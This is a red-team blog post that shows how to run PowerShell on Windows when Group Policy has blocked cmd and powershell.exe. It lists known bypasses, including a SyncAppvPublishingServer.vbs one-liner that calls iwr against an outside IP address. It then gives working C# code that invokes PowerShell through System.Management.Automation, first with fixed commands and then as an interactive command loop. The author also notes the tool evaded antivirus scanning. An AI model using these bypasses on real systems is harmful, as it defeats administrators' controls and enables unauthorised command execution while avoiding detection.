Introduction:
Hello all, back with another post, but first it's story time. So few months ago me and my colleague were talking about different red team scenarios and one of the scenario we made was what will be do in an environment where there's no powershell or cmd available there must be a way to get around it.
First things first let's disable powershell as well as cmd:
Go to the start button and type edit group policy
Then go to User configuration -> Administrative Templates -> System -> Prevent Access to the Command prompt
and for powershell:
User configuration -> Administrative Templates -> System -> Don't run specified Windows applications and add powershell.exe
Let's verify whether cmd and powershell are restricted or not:
Work Around From The Internet:
We started working for a solution and we found a few different solutions online which are mentioned below:
Using Powershdll:
https://github.com/p3nt4/PowerShdll
Using SyncAppvPublishingServer:
SyncAppvPublishingServer.vbs "echo ''; iwr http://192.168.11.21:4446"
There are few more programs that can help in using powershell without powershell.exe, I won't go over all the programs, here is a really awesome blog covering few of the programs:
My Own Solution:
There were two problems of the above programs, one most of the programs defined above were being caught by the AV and in an enterprise environment that could cost you the whole activity, the second that I was not actually satisfied, I wanted something different, something other than this. I wanted to build my own solution, so I started researching about powershell and how it actually initializes I came across the
microsoft documentation and it had the answer for me.
The System.Management.Automation.dll has the powershell class and anyone can initialize powershell class directly from the dll and execute commands using any programming language. I decided to test this out using C#. I am using visual studio code, I will demonstrate a simple program that will execute powershell command even when it is restricted by Local Group Policy.
I wrote a small program that will execute whoami and hostname command:
using System;
using System.Management.Automation;
using System.Collections.ObjectModel;
namespace Testing
{
class Program
{
static void Main(string[] args)
{
PowerShell ps = PowerShell.Create();
string command;
Collection<PSObject> PSOutput;
command = "whoami; hostname";
PSOutput = ps.AddScript(command).Invoke();
for (int i=0; i<PSOutput.Count; i++)
{
Console.WriteLine(PSOutput[i].ToString());
}
Console.ReadLine();
}
}
}
What the above program is doing is that first it initializes powershell, I have hard-coded the command which is "whoami" and "hostname" after that it will Invoke the command and save it in the PSOutput array and the for loop will display the array values. Compile the program with csc.exe and execute the program:
csc.exe /reference:"C:\Program Files (x86)\Reference Assemblies\Microsoft\WindowsPowerShell\3.0\System.Management.Automation.dll" powershell.cs /out:test.exe
After compiling we will have the exe file, executing the exe file will give us the command output:
And there we have it we executed powershell command without powershell and thus bypassing the Local Group Policy. There are a lot of different techniques that could be used for example we can rename powershell.exe to something else and it will run, or you can simply use a C2 agent to execute the commands. Most of the programs mentioned above will be detected by the AV, as far as this solution is concerned I have scanned this program with antiscanme and it was clean. This solution is also applicable for Active Directory environment (Domain Group Policy).
We can change the program to take input and execute the command:
using System;
using System.Management.Automation;
using System.Collections.ObjectModel;
namespace Testing
{
class Program
{
static void Main(string[] args)
{
PowerShell ps = PowerShell.Create();
string command;
Collection<PSObject> PSOutput;
while (true)
{
command = Console.ReadLine();
PSOutput = ps.AddScript(command).Invoke();
if (command == "exit")
{
break;
}
for (int i=0; i<PSOutput.Count; i++)
{
Console.WriteLine(PSOutput[i].ToString());
}
}
Console.ReadLine();
}
}
}
It's a very simple and dirty solution but it can get the job done. I'll leave it for others to play with it.
Happy Hacking
Nayani.
